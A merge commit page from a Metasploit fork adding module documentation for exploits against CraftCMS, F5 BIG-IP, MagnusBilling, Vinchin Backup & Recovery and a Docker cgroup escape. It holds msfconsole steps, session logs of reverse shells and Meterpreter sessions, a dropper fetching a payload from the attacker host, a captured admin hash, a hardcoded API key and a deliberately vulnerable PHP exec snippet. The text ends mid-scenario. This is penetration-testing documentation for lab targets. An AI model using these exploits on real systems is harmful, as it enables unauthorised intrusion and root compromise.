adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into docker-kernel-module-escape

Browse Source
This commit is contained in:
RadioLogic
2024-03-04 22:58:18 -05:00
parent 82b8556c78 94a4a6173f
commit cbbb6cbda4
235 changed files with 33723 additions and 5573 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/craftcms_unauth_rce_cve_2023_41892.md
+231
View File
@@ -0,0 +1,231 @@
## Vulnerable Application
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in CraftCMS which is a popular content management system.
CraftCMS versions between `4.0.0-RC1` - `4.4.14` are affected by this vulnerability allowing attackers to execute arbitrary code remotely,
potentially compromising the security and integrity of the application.
The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class which allows to run arbitrary
PHP code by escalating the object creation calling some methods available in `\GuzzleHttp\Psr7\FnStream`.
Using this vulnerability in combination with `The Imagick Extension` and `MSL` which stands for `Magick Scripting Language`,
a full RCE can be achieved. `MSL` is a built-in `ImageMagick` language that facilitates the reading of images, performance of
image processing tasks, and writing of results back to the filesystem. This can be leveraged to create a dummy image containing malicious
PHP code using the `Imagick` constructor class delivering a webshell that can be accessed by the attacker, thereby executing the malicious
PHP code and gaining access to the system.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain access to the underlying operating
system as the user that the web services are running as (typically `www-data`).
## Installation
To test this module, you will need a vulnerable CraftCMS application.
This module has been tested on:
- [ ] `CraftCMS 4.4.14` running on MacOS Docker Desktop based on a `DDEV` deployment.
### Installation steps to install CraftCMS on MacOS using Desktop Docker and DDEV
* Install [Docker Desktop](https://ddev.readthedocs.io/en/stable/users/install/docker-installation/#macos) on your MacOS distribution.
* Install [DDEV](https://ddev.readthedocs.io/en/stable/users/install/ddev-installation/).
* Install CraftCMS following these [installation steps](https://craftcms.com/docs/getting-started-tutorial/install/).
* NOTE: After step 2 `Scaffold the project from the official starter project`, open composer.json to edit the CraftCMS version and
* set it to `4.4.14` or lower.
* Run `composer update` to downgrade the `CraftCMS` version to a vulnerable version.
* See also these [instructions](https://craftcms.com/knowledge-base/downloading-previous-craft-versions).
* Continue with step 3 and after completion, you should be able to access your application using your site name (https://mysite.ddev.site)
* To access your application from another host, you need to setup a tunnel otherwise you can only access it from the local machine.
* You can follow these [instructions](https://stackoverflow.com/questions/53371087/access-ddev-web-container-from-other-hosts).
You are now ready to test the module.
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/craftcms_unauth_rce_cve_2023_41892`
- [x] `set rhosts <ip-target>`
- [x] `set rport 443`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=php, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`
you should get a `shell` or `Meterpreter`
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > info
Name: Craft CMS unauthenticated Remote Code Execution (RCE)
Module: exploit/linux/http/craftcms_unauth_rce_cve_2023_41892
Platform: Unix, Linux, PHP
Arch: cmd, php, x64, x86
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2023-09-13
Provided by:
chybeta
h00die-gr3y <h00die.gr3y@gmail.com>
Module side effects:
artifacts-on-disk
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 PHP
1 Unix Command
2 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Craft CMS base url
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
WEBSHELL no The name of the webshell with extension .php. Webshell name will be randomly generated if left unset
.
When TARGET is not 0:
Name Current Setting Required Description
---- --------------- -------- -----------
COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec)
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.
0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload information:
Description:
This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular
content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are affected by this vulnerability
allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity
of the application.
The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class
which allows to run arbitary PHP code by escalating the object creation calling some methods available in
`\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which
stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that
facilitates the reading of images, performance of image processing tasks, and writing of results back
to the filesystem. This can be leveraged to create a dummy image containing mailcious PHP code using the
Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the
malicious PHP code and gaining access to the system.
Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain
access to the underlying operating system as the user that the web services are running as (typically www-data).
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-41892
https://blog.calif.io/p/craftcms-rce
https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/
https://github.com/advisories/GHSA-4w8r-3xrw-v25g
https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892
View the full module info with the info -d command.
```
## Options
### WEBSHELL
You can use this option to set the filename of the webshell with extension `.php`, otherwise the name will be randomly generated.
### COMMAND
This option provides the user to choose the PHP underlying shell command function to be used for execution.
The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`.
This option is only available when the target selected is either Unix Command or Linux Dropper.
For the native PHP target, by default the `eval()` function will be used for native PHP code execution.
## Scenarios
### CraftCMS 4.4.14 on MacOS PHP - php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/CDfbvAnrZMH.php
[+] Deleted /tmp/php5M63PK
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:51044) at 2023-12-17 12:31:55 +0000
meterpreter > sysinfo
Computer : craftcms-vuln-web
OS : Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
### CraftCMS 4.4.14 on MacOS Unix Command - cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 1
target => 1
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /var/www/html/web/XGCuZFdoia.php
[+] Deleted /tmp/phpakTlmu
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:51101) at 2023-12-17 12:34:34 +0000
uname -a
Linux craftcms-vuln-web 6.4.16-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Nov 16 10:55:59 UTC 2023 x86_64 GNU/Linux
id
uid=501(www-data) gid=20(dialout) groups=20(dialout)```
### CraftCMS 4.4.14 on MacOS Linux Dropper - linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > set target 2
target => 2
msf6 exploit(linux/http/craftcms_unauth_rce_cve_2023_41892) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/bzzA52uoIqWP
[*] Client 192.168.201.25 (Wget/1.21) requested /bzzA52uoIqWP
[*] Sending payload to 192.168.201.25 (Wget/1.21)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted /var/www/html/web/sFQEhvKKcl.php
[+] Deleted /tmp/phpeQPKpy
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:51122) at 2023-12-17 12:35:54 +0000
[*] Command Stager progress - 100.00% done (118/118 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.16.2
OS : Debian 11.8 (Linux 6.4.16-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
```
## Limitations
Part of the exploit is the MSL script creation triggered by the Imagick plugin module. These files are created in the directory
set by the `upload_tmp_dir` setting in the `php.ini` file (default `/tmp`). These files are automatically cleaned, but in case of
any failure cleaning these files, do clean them manually otherwise the next exploit session will fail using an outdated MSL file.
These files start with `php` and you can list them with the command `ls php*`.
documentation/modules/exploit/linux/http/f5_bigip_tmui_rce.md → documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902.md
+6 -6
View File
@@ -52,11 +52,11 @@ Defaults to `/tmp`.
### F5 BIG-IP 14.1.2 in VMware Fusion
```
msf5 > use exploit/linux/http/f5_bigip_tmui_rce
msf5 > use exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/f5_bigip_tmui_rce) > options
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > options
Module options (exploit/linux/http/f5_bigip_tmui_rce):
Module options (exploit/linux/http/f5_bigip_tmui_rce_cve_2020_5902):
Name Current Setting Required Description
---- --------------- -------- -----------
@@ -87,11 +87,11 @@ Exploit target:
1 Linux Dropper
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set rhosts 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set rhosts 172.16.249.179
rhosts => 172.16.249.179
msf5 exploit(linux/http/f5_bigip_tmui_rce) > set lhost 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf5 exploit(linux/http/f5_bigip_tmui_rce) > run
msf5 exploit(linux/http/f5_bigip_tmui_rce_cve_2020_5902) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] Executing automatic check (disable AutoCheck to override)
documentation/modules/exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747.md
+77
View File
@@ -0,0 +1,77 @@
## Vulnerable Application
### Description
This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
created.
Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.
### Setup
Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.
The target does not need to be licensed to be vulnerable.
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.
## Targets
### Command
This executes an OS command on the target device.
## Options
## Scenarios
### F5 BIG-IP 17.0.0.1-0.0.4
```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : f5test2.home.lan
OS : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========
host origin service public private realm private_type JtR Format cracked_password
---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
192.168.159.32 192.168.159.32 443/tcp (F5 BIG-IP TMUI) admin $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED) Nonreplayable hash sha512,crypt
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) >
```
documentation/modules/exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258.md
+241
View File
@@ -0,0 +1,241 @@
## Vulnerable Application
`MagnusBilling` is an open source tool written in `PHP` and `JAVASCRIPT`, aimed at IP telephony providers.
It provides a complete and powerful system for anyone to start an IP telephony provider.
Unfortunately a command injection vulnerability exists in `MagnusBilling` versions 6 and 7.
The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.
This is caused by a piece of demonstration code which is present in `lib/icepay/icepay.php`, with a call to `exec()` at line 753.
The parameter to `exec()` includes the `GET` parameter `democ`, which is controlled by the user.
An unauthenticated user is able to execute arbitrary OS commands.
The commands run with the privileges of the web server process, typically `www-data` or `asterisk`.
At a minimum, this allows an attacker to compromise the billing system and its database.
See this [attackerkb article](https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258) for more information.
## Installation
This module has been tested on:
- Debian 12.2 running on VirtualBox 7 with MagnusBilling 7 installed.
- CentOS 7 running on VirtualBox 7 with MagnusBilling 6 installed.
### Installation steps
* Install Debian 11 or later on VirtualBox.
* Follow these [instructions](https://linux.how2shout.com/install-debian-11-bullseye-on-virtualbox/).
* Login into Debian Linux machine.
* Switch to root with `su -` if needed.
* Follow the install instructions for either [MagnusBilling 7](https://github.com/magnussolution/magnusbilling7) or
[MagnusBilling 6](https://github.com/magnussolution/magnusbilling6)
* After successful installation, you can test the module with the verification steps listed at the **Verification** section.
PS: If you have installed MagnusBilling 7, please update the `mbilling/lib/icepay/icepay.php` file at the web server root,
typically `/var/www/html`, by adding the vulnerable code below.
```php
if (isset($_GET['demo'])) {
if ($_GET['demo'] == 1) {
exec("touch idepay_proccess.php");
} else {
exec("rm -rf idepay_proccess.php");
}
}
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
```
## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258`
- [x] `set rhosts <ip-target>`
- [x] `set rport <port>`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>`
- [x] `exploit`
you should get a `shell` or `Meterpreter` session.
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > info
Name: MagnusBilling application unauthenticated Remote Command Execution.
Module: exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
Platform: PHP, Unix, Linux
Arch: php, cmd, x64, x86
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2023-06-26
Provided by:
h00die-gr3y <h00die.gr3y@gmail.com>
Eldstal
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
=> 0 PHP
1 Unix Command
2 Linux Dropper
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local ma
chine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left
unset.
Payload information:
Description:
A Command Injection vulnerability in MagnusBilling application 6.x and 7.x allows
remote attackers to run arbitrary commands via unauthenticated HTTP request.
A piece of demonstration code is present in `lib/icepay/icepay.php`, with a call to an exec().
The parameter to exec() includes the GET parameter `democ`, which is controlled by the user and
not properly sanitised/escaped.
After successful exploitation, an unauthenticated user is able to execute arbitrary OS commands.
The commands run with the privileges of the web server process, typically `www-data`.
At a minimum, this allows an attacker to compromise the billing system and its database.
The following MagnusBilling applications are vulnerable:
- MagnusBilling application version 6 (all versions);
- MagnusBilling application up to version 7.x and including commit 7af21ed620;
References:
https://nvd.nist.gov/vuln/detail/CVE-2023-30258
https://attackerkb.com/topics/DFUJhaM5dL/cve-2023-30258
https://eldstal.se/advisories/230327-magnusbilling.html
View the full module info with the info -d command.
```
## Options
### TARGETURI
The uripath to the `MagnusBilling` web application. Default set is to `/mbilling`.
### WEBSHELL
You can use this option to set the filename and extension (should be .php) of the webshell.
This is handy if you want to test the webshell upload and execution with different file names.
to bypass any security settings on the Web and PHP server.
## Scenarios
### MagnusBilling 7 on Debian 12.2 - PHP with payload php/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set rhosts 192.168.201.34
rhosts => 192.168.201.34
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 5 seconds.
[*] Elapsed time: 5.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.34
[+] Deleted LfsCVIttNL.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.34:46230) at 2023-10-24 10:26:47 +0000
meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer : debian
OS : Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64
Meterpreter : php/linux
meterpreter >
```
### MagnusBilling 7 on Debian 12.2 - Unix Command with payload cmd/unix/reverse_bash
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 1
target => 1
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 2 seconds.
[*] Elapsed time: 2.1 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (192.168.201.8:4444 -> 192.168.201.34:46396) at 2023-10-24 17:09:45 +0000
uname -a
Linux debian 6.1.0-13-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.55-1 (2023-09-29) x86_64 GNU/Linux
id
uid=1001(asterisk) gid=1001(asterisk) groups=1001(asterisk)
pwd
/var/www/html/mbilling/lib/icepay
```
### MagnusBilling 7 on Debian 12.2 - Linux Dropper with payload linux/x64/meterpreter/reverse_tcp
```shell
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set target 2
target => 2
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > exploit
[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.34:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 4 seconds.
[*] Elapsed time: 4.09 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/3X16QTzG27N
[*] Client 192.168.201.34 (Wget/1.21.3) requested /3X16QTzG27N
[*] Sending payload to 192.168.201.34 (Wget/1.21.3)
[*] Sending stage (3045380 bytes) to 192.168.201.34
[*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.34:55224) at 2023-10-24 17:12:05 +0000
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.34
OS : Debian 12.2 (Linux 6.1.0-13-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: asterisk
meterpreter > pwd
/var/www/html/mbilling/lib/icepay
meterpreter >
```
## Limitations
No limitations identified.
documentation/modules/exploit/linux/http/vinchin_backup_recovery_cmd_inject.md
+170
View File
@@ -0,0 +1,170 @@
## Vulnerable Application
This module exploits a vulnerability in Vinchin Backup & Recovery versions 5.0.x, 6.0.x, 6.7.x, and 7.0.x. To prepare the environment:
1. Download Vinchin Backup & Recovery version 5.0.x, 6.0.x, 6.7.x, or 7.0.x.
2. Install the software on a Linux-based server using the downloaded ISO.
3. During the installation, ensure that the network interface is active and configured.
4. After installation, verify that the Vinchin Backup & Recovery service is operational and accessible over the network.
*Note: The module is designed to work with the specified versions. Functionality with other versions has not been confirmed.*
## Verification Steps
1. Install a vulnerable version of Vinchin Backup & Recovery (versions 5.0.x, 6.0.x, 6.7.x, or 7.0.x).
2. Start msfconsole in your Metasploit environment.
3. Do: `use exploit/linux/http/vinchin_backup_recovery_cmd_inject`
4. Set the RHOSTS to the target IP address or hostname.
5. Do: `run`
6. If the target is vulnerable, the exploit will execute the specified payload or command.
## Options
Here are the specific options for the `exploit/linux/http/vinchin_backup_recovery_cmd_inject` module:
#### RHOSTS
- **Description**: Specifies the target address or range of addresses.
- **Default Value**: None. It must be set by the user.
#### RPORT
- **Description**: The port on which the Vinchin Backup & Recovery service is running.
- **Default Value**: 443 (this is not configurable in the default Vinchin Backup & Recovery setup).
#### SSL
- **Description**: Specifies whether to use SSL for the connection.
- **Default Value**: True, as Vinchin typically runs over HTTPS.
#### TARGETURI
- **Description**: The base path to the Vinchin Backup & Recovery application.
- **Default Value**: `/`
#### APIKEY
- **Description**: The hardcoded API key required to authenticate to the API.
- **Default Value**: `6e24cc40bfdb6963c04a4f1983c8af71`
## Scenarios
### Successful Exploitation against Vinchin Backup & Recovery 7.0.1.26282
This scenario demonstrates exploiting the Vinchin Backup & Recovery version 7.0.1.26282 on a Linux server.
**Environment**:
- Vinchin Backup & Recovery 7.0.1.26282
- Linux Server
- Metasploit Framework
**Steps**:
1. Start `msfconsole`.
2. Load the exploit module:
```
use exploit/linux/http/vinchin_backup_recovery_cmd_inject
```
4. Set the required options:
```
set RHOSTS [target IP]
set APIKEY [API Key]
```
5. Optionally set a payload and configure LHOST and LPORT.
6. Execute the exploit:
```
exploit
```
**Expected Output**:
```
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > options
Module options (exploit/linux/http/vinchin_backup_recovery_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY 6e24cc40bfdb6963c04a4f1983c8 yes The hardcoded API key
af71
Proxies no A proxy chain of format type:host:port[,type:host:
port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.co
m/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is rando
mly generated)
TARGETURI / yes The base path to the Vinchin Backup & Recovery app
lication
URIPATH no The URI to use for this exploit (default is random
)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an
address on the local machine or 0.0.0.0 to listen on all address
es.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FT
P, TFTP, TNFTP, WGET)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME JSSwiKfcOw no Name to use on remote system when storing pa
yload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR /usr/share/nginx/vinchin/ yes Remote writable dir to store payload; cannot
tmp contain spaces.
LHOST 192.168.1.5 yes The listen address (an interface may be spec
ified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > set rhosts 192.168.1.3
rhosts => 192.168.1.3
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > check
[*] Detected Vinchin version: 7.0.1.26282
[+] 192.168.1.3:443 - The target is vulnerable.
msf6 exploit(linux/http/vinchin_backup_recovery_cmd_inject) > exploit
[*] Started reverse TCP handler on 192.168.1.5:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Vinchin version: 7.0.1.26282
[+] The target is vulnerable.
[*] Sending stage (3045380 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:58960) at 2023-11-21 02:00:57 +0100
meterpreter > sysinfo
Computer : localhost.localdomain
OS : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
Note: All instances of this exploit can be subject to privilege escalation using the
`exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec` module in the Metasploit environment.
documentation/modules/exploit/linux/local/docker_cgroup_escape.md
+139
View File
@@ -0,0 +1,139 @@
## Vulnerable Application
This exploit module takes advantage of a Docker image which has either the privileged flag, or SYS_ADMIN Linux capability.
If the host kernel is vulnerable, its possible to escape the Docker image and achieve root on the host operating system.
A vulnerability was found in the Linux kernel's `cgroup_release_agent_write` in the `kernel/cgroup/cgroup-v1.c` function.
This flaw, under certain circumstances, allows the use of the cgroups v1 `release_agent` feature to escalate privileges
and bypass the namespace isolation unexpectedly.
More simply put, cgroups v1 has a feature called `release_agent` that runs a program when a process in the cgroup terminates.
If `notify_on_release` is enabled, the kernel runs the `release_agent` binary as root. By editing the release_agent file,
an attacker can execute their own binary with elevated privileges, taking control of the system. However, the `release_agent`
file is owned by root, so only a user with root access can modify it.
### Docker Setup
`sudo docker run --rm -it --privileged ubuntu:20.04 bash`
or
`sudo docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:20.04 bash`
You may want to install `wget` to make initial exploitation easier as well:
```
apt-get update
apt-get install -y wget
```
## Verification Steps
1. Install Docker and start a docker container
2. Start msfconsole
3. Get a shell on the docker image as root.
4. Do: `use exploit/linux/local/docker_cgroup_escape`
5. Do: `set lhost [ip]`
6. Do: `set session [#]`
7. Do: `run`
8. You should get a root shell on the host OS.
## Options
## Scenarios
### Ubuntu 18.04 LTS with 4.15.0-96-generic kernel and Docker Ubuntu 20.04
Initial Access
```
resource (docker.rb)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (docker.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (docker.rb)> set srvport 8181
srvport => 8181
resource (docker.rb)> set target 7
target => 7
resource (docker.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (docker.rb)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://1.1.1.1:8181/QZWpVr8t
[*] Server started.
[*] Run the following command on the target machine:
